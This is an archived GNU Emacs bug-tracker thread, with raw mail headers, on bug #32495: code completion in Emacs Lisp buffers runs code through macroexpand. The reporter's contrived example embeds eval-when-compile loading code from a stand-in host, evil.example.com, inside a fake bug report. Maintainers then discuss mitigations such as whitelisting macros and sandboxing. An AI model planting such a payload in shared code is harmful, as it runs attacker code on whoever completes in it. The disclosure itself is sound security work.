Received: (at 32495) by debbugs.gnu.org; 23 Aug 2018 18:54:41 +0000 From debbugs-submit-bounces <at> debbugs.gnu.org Thu Aug 23 14:54:41 2018 Received: from localhost ([127.0.0.1]:59090 helo=debbugs.gnu.org) by debbugs.gnu.org with esmtp (Exim 4.84_2) (envelope-from <debbugs-submit-bounces <at> debbugs.gnu.org>) id 1fsukj-0003z1-AX for submit <at> debbugs.gnu.org; Thu, 23 Aug 2018 14:54:41 -0400 Received: from pmta11.teksavvy.com ([76.10.157.34]:42471) by debbugs.gnu.org with esmtp (Exim 4.84_2) (envelope-from <monnier@HIDDEN>) id 1fsukg-0003yk-6e for 32495 <at> debbugs.gnu.org; Thu, 23 Aug 2018 14:54:39 -0400 X-IronPort-Anti-Spam-Filtered: true X-IronPort-Anti-Spam-Result: =?us-ascii?q?A2FSCwBbAn9b/+N53mhcHAEBAQQBAQoBA?= =?us-ascii?q?YNPgWSIQ4RBiz4BggwTIAGXZwuEZgQCAoMOIjgUAQIBAQEBAQECAgJpKIU5AQQ?= =?us-ascii?q?BViMFCwsOJhIUGA0khS8IpGCKYIk3ggCDdi6KVgKSUohKCZAEiDOGDZM/gVgig?= =?us-ascii?q?VIzGggwgyWCTI4iI45wAQE?= X-IPAS-Result: =?us-ascii?q?A2FSCwBbAn9b/+N53mhcHAEBAQQBAQoBAYNPgWSIQ4RBiz4?= =?us-ascii?q?BggwTIAGXZwuEZgQCAoMOIjgUAQIBAQEBAQECAgJpKIU5AQQBViMFCwsOJhIUG?= =?us-ascii?q?A0khS8IpGCKYIk3ggCDdi6KVgKSUohKCZAEiDOGDZM/gVgigVIzGggwgyWCTI4?= =?us-ascii?q?iI45wAQE?= X-IronPort-AV: E=Sophos;i="5.53,279,1531800000"; d="scan'208";a="44991267" Received: from 104-222-121-227.cpe.teksavvy.com (HELO fmsmemgm.homelinux.net) ([104.222.121.227]) by smtp.teksavvy.com with ESMTP/TLS/DHE-RSA-AES256-GCM-SHA384; 23 Aug 2018 14:54:31 -0400 Received: by fmsmemgm.homelinux.net (Postfix, from userid 20848) id 76740AE120; Thu, 23 Aug 2018 14:54:31 -0400 (EDT) From: Stefan Monnier <monnier@HIDDEN> To: Wilfred Hughes <me@HIDDEN> Subject: Re: bug#32495: 26.1; Arbitrary code execution when completing inside untrusted elisp code Message-ID: <jwvefeoudlu.fsf-monnier+emacs@HIDDEN> References: <CAFXAjY7CEXsZfH_RNA8QjDYm7ynJtuCbBZOeSVATcA6rNw+qpQ@HIDDEN> Date: Thu, 23 Aug 2018 14:54:31 -0400 In-Reply-To: <CAFXAjY7CEXsZfH_RNA8QjDYm7ynJtuCbBZOeSVATcA6rNw+qpQ@HIDDEN> (Wilfred Hughes's message of "Wed, 22 Aug 2018 01:11:55 +0100") User-Agent: Gnus/5.13 (Gnus v5.13) Emacs/27.0.50 (gnu/linux) MIME-Version: 1.0 Content-Type: text/plain X-Spam-Score: 0.3 (/) X-Debbugs-Envelope-To: 32495 Cc: 32495 <at> debbugs.gnu.org X-BeenThere: debbugs-submit <at> debbugs.gnu.org X-Mailman-Version: 2.1.18 Precedence: list List-Id: <debbugs-submit.debbugs.gnu.org> List-Unsubscribe: <https://debbugs.gnu.org/cgi-bin/mailman/options/debbugs-submit>, <mailto:debbugs-submit-request <at> debbugs.gnu.org?subject=unsubscribe> List-Archive: <https://debbugs.gnu.org/cgi-bin/mailman/private/debbugs-submit/> List-Post: <mailto:debbugs-submit <at> debbugs.gnu.org> List-Help: <mailto:debbugs-submit-request <at> debbugs.gnu.org?subject=help> List-Subscribe: <https://debbugs.gnu.org/cgi-bin/mailman/listinfo/debbugs-submit>, <mailto:debbugs-submit-request <at> debbugs.gnu.org?subject=subscribe> Errors-To: debbugs-submit-bounces <at> debbugs.gnu.org Sender: "Debbugs-submit" <debbugs-submit-bounces <at> debbugs.gnu.org> X-Spam-Score: -0.7 (/) > 1. pass in an environment with all untrusted macros replaced with dummies: Sounds like a good first step. We could even start with a blacklist rather than a whitelist (eval-when-compile, eval-and-compile, cl-eval-when, ...), so the point would be to protect oneself from accidental problems rather than from malign adversaries. > 2. bind all eval-capable functions first (INCOMPLETE, there are other > eval-capable functions, such as load): Trying to plug each and every hole sounds like a losing game (e.g. you can implement `eval` by building a `(lambda () ,exp) and then causing it to be called one way or another). Ideally, we'd have some way to confine Elisp code to a sandbox of some sort (e.g. no access to any I/O and all changes to global vars are ignored). Stefan
bug-gnu-emacs@HIDDEN
:bug#32495
; Package emacs
.
Full text available.Glenn Morris <rgm@HIDDEN>
to control <at> debbugs.gnu.org
.
Full text available.Received: (at submit) by debbugs.gnu.org; 22 Aug 2018 00:12:33 +0000 From debbugs-submit-bounces <at> debbugs.gnu.org Tue Aug 21 20:12:33 2018 Received: from localhost ([127.0.0.1]:57143 helo=debbugs.gnu.org) by debbugs.gnu.org with esmtp (Exim 4.84_2) (envelope-from <debbugs-submit-bounces <at> debbugs.gnu.org>) id 1fsGlE-00033s-MQ for submit <at> debbugs.gnu.org; Tue, 21 Aug 2018 20:12:32 -0400 Received: from eggs.gnu.org ([208.118.235.92]:34000) by debbugs.gnu.org with esmtp (Exim 4.84_2) (envelope-from <me@HIDDEN>) id 1fsGlD-00033h-Sc for submit <at> debbugs.gnu.org; Tue, 21 Aug 2018 20:12:32 -0400 Received: from Debian-exim by eggs.gnu.org with spam-scanned (Exim 4.71) (envelope-from <me@HIDDEN>) id 1fsGl6-0001ax-Oj for submit <at> debbugs.gnu.org; Tue, 21 Aug 2018 20:12:26 -0400 X-Spam-Checker-Version: SpamAssassin 3.3.2 (2011-06-06) on eggs.gnu.org X-Spam-Level: X-Spam-Status: No, score=0.8 required=5.0 tests=BAYES_50,T_DKIM_INVALID autolearn=disabled version=3.3.2 Received: from lists.gnu.org ([2001:4830:134:3::11]:39583) by eggs.gnu.org with esmtps (TLS1.0:RSA_AES_256_CBC_SHA1:32) (Exim 4.71) (envelope-from <me@HIDDEN>) id 1fsGl4-0001aU-UE for submit <at> debbugs.gnu.org; Tue, 21 Aug 2018 20:12:24 -0400 Received: from eggs.gnu.org ([2001:4830:134:3::10]:54981) by lists.gnu.org with esmtp (Exim 4.71) (envelope-from <me@HIDDEN>) id 1fsGl3-00026V-V4 for bug-gnu-emacs@HIDDEN; Tue, 21 Aug 2018 20:12:22 -0400 Received: from Debian-exim by eggs.gnu.org with spam-scanned (Exim 4.71) (envelope-from <me@HIDDEN>) id 1fsGkz-0001WR-Q5 for bug-gnu-emacs@HIDDEN; Tue, 21 Aug 2018 20:12:21 -0400 Received: from mail-qk0-x233.google.com ([2607:f8b0:400d:c09::233]:39620) by eggs.gnu.org with esmtps (TLS1.0:RSA_AES_128_CBC_SHA1:16) (Exim 4.71) (envelope-from <me@HIDDEN>) id 1fsGkz-0001Vh-Af for bug-gnu-emacs@HIDDEN; Tue, 21 Aug 2018 20:12:17 -0400 Received: by mail-qk0-x233.google.com with SMTP id b19-v6so115621qkc.6 for <bug-gnu-emacs@HIDDEN>; Tue, 21 Aug 2018 17:12:16 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=wilfred-me-uk.20150623.gappssmtp.com; s=20150623; h=mime-version:from:date:message-id:subject:to; bh=wNhca8jq89xU+bpdWGm6jYsd1Q5bz9s7PMf7+sj6eHk=; b=svqvWuwphtIuSCfx9/r2uxLFzHXkIttUlpcOuW0nyQlTXUXgaobKzKZfkgKudvc7oV P2W8IVh7cXWtEJsLdkKfvzx6MSTbjWg3W8YgKbxRQn/voFjcLR7uDwgJtoj9sAmtmt6A W5u6NEWvPpeTDq55n+93wgApzjsH9T+VW0EuXpHrLucwzw76IXd0aI+DEt05bohX4F2J 7/Vrlvse7cuwVuW5FNRHNl1a+BEoV0XvCbIxW8uZGA5zM9DVDIc1g4ZEGpIcjXkjXWz0 /cPTgqT5RODSTfLZYUh/4FQsKklBL0PdMIHinAzIArnOCbtRr/nIdToPfVWmnXR2H1Oz mY0Q== X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=1e100.net; s=20161025; h=x-gm-message-state:mime-version:from:date:message-id:subject:to; bh=wNhca8jq89xU+bpdWGm6jYsd1Q5bz9s7PMf7+sj6eHk=; b=awQkDBnnkF1i0IbC7gMqcpqZ7dGCZB3Qt1/28UHrXs3h/nxmMsQHDb41bFTgCXDEgQ I1K+EdinWpJTqavwZ3IIzNgYQEPOXqueOkyI92sLxXSq7FmFfMOaW4259v5tfkxPt6WQ BEWLJFTqbOuoLXq4UPfS/+7gUnZS++bX9wWUbratUVgI3pIWqepyhCIzAnBnEr3EfZdo eBUmHHEk5HZz9qX2qAfk0Z+/PytnnyGDqOj1es7Bk1VcoBtI8v/+H5T81KNcD4252OpV pSuUsi8ifns2Okzbx7xoYg6pOYa6j3QZ/iJnBvszRAAUttzbWFRtnetZ6eW511S5HjFl c1NA== X-Gm-Message-State: AOUpUlHPeAqbCf9lGWAhOgQmkzOJzpFZG6A4MxxSQz+urLQqKHusQij2 Oe4TtsRlQgNgA1VapdYrh2wt4a5QFszZtEHIkyMchN0wIa0= X-Google-Smtp-Source: AA+uWPwsBbdQuusbmfMdRCFJFbB/+dMneRYGG/E9yTyYeYnI+yxh+eqT0kQwkVnVJKjPZysbYlEKIFlhx2N/d3yRXVY= X-Received: by 2002:a37:76c6:: with SMTP id r189-v6mr46370064qkc.282.1534896735980; Tue, 21 Aug 2018 17:12:15 -0700 (PDT) MIME-Version: 1.0 Received: by 2002:aed:3305:0:0:0:0:0 with HTTP; Tue, 21 Aug 2018 17:11:55 -0700 (PDT) X-Originating-IP: [92.233.94.77] From: Wilfred Hughes <me@HIDDEN> Date: Wed, 22 Aug 2018 01:11:55 +0100 Message-ID: <CAFXAjY7CEXsZfH_RNA8QjDYm7ynJtuCbBZOeSVATcA6rNw+qpQ@HIDDEN> Subject: 26.1; Arbitrary code execution when completing inside untrusted elisp code To: bug-gnu-emacs@HIDDEN Content-Type: text/plain; charset="UTF-8" X-detected-operating-system: by eggs.gnu.org: Genre and OS details not recognized. X-detected-operating-system: by eggs.gnu.org: GNU/Linux 2.6.x X-Received-From: 2001:4830:134:3::11 X-Spam-Score: -4.0 (----) X-Debbugs-Envelope-To: submit X-BeenThere: debbugs-submit <at> debbugs.gnu.org X-Mailman-Version: 2.1.18 Precedence: list List-Id: <debbugs-submit.debbugs.gnu.org> List-Unsubscribe: <https://debbugs.gnu.org/cgi-bin/mailman/options/debbugs-submit>, <mailto:debbugs-submit-request <at> debbugs.gnu.org?subject=unsubscribe> List-Archive: <https://debbugs.gnu.org/cgi-bin/mailman/private/debbugs-submit/> List-Post: <mailto:debbugs-submit <at> debbugs.gnu.org> List-Help: <mailto:debbugs-submit-request <at> debbugs.gnu.org?subject=help> List-Subscribe: <https://debbugs.gnu.org/cgi-bin/mailman/listinfo/debbugs-submit>, <mailto:debbugs-submit-request <at> debbugs.gnu.org?subject=subscribe> Errors-To: debbugs-submit-bounces <at> debbugs.gnu.org Sender: "Debbugs-submit" <debbugs-submit-bounces <at> debbugs.gnu.org> X-Spam-Score: -5.0 (-----) elisp-completion-at-point calls macroexpand, which may execute arbitrary code. REPRODUCING 1. Insert this code in a buffer in emacs-lisp-mode. (let ((foo (eval-when-compile (debug)))) x) 2. Put point on x. 3. Press C-M-i, or M-x elisp-completion-at-point. 4. Observe that the debugger is opened, because code is being executed! SEVERITY I don't know whether Emacs considers calling code-completion on untrusted code to be a concern or not. A contrived example might look like a bug report containing the following: (let ((foo (eval-when-compile (eval "/ftp:evil.example.com:exploit.el"))) ;; ... lots of code (bar 1)) ;; Dear maintainer, I've found a bug in your completion. Please try ;; completion in the following: abc ) This could also cause accidental issues, as I might edit code that has some unwanted side-effects inside eval-when-compile blocks. However, this functionality has existed since 2013 (added in commit bbcc4d97447a by Stefan) and no-one has noticed so far. WORKAROUNDS When calling macroexpand or macroexpand-all, either: 1. pass in an environment with all untrusted macros replaced with dummies: (let ((macro-whitelist '(when pcase)) all-macros safe-env) (mapatoms (lambda (sym) (when (macrop sym) (push sym all-macros)))) (mapc (lambda (sym) (unless (memq sym macro-whitelist) (push (cons sym (symbol-function 'ignore)) safe-env))) all-macros) (macroexpand-all arbitrary-form-here safe-env)) 2. bind all eval-capable functions first (INCOMPLETE, there are other eval-capable functions, such as load): (cl-letf (((symbol-function 'eval) #'ignore) ((symbol-function 'eval-region) #'ignore) ((symbol-function 'eval-buffer) #'ignore) ((symbol-function 'backtrace-eval) #'ignore)) (macroexpand-all some-arbitrary-form-here))
Wilfred Hughes <me@HIDDEN>
:bug-gnu-emacs@HIDDEN
.
Full text available.bug-gnu-emacs@HIDDEN
:bug#32495
; Package emacs
.
Full text available.
GNU bug tracking system
Copyright (C) 1999 Darren O. Benham,
1997 nCipher Corporation Ltd,
1994-97 Ian Jackson.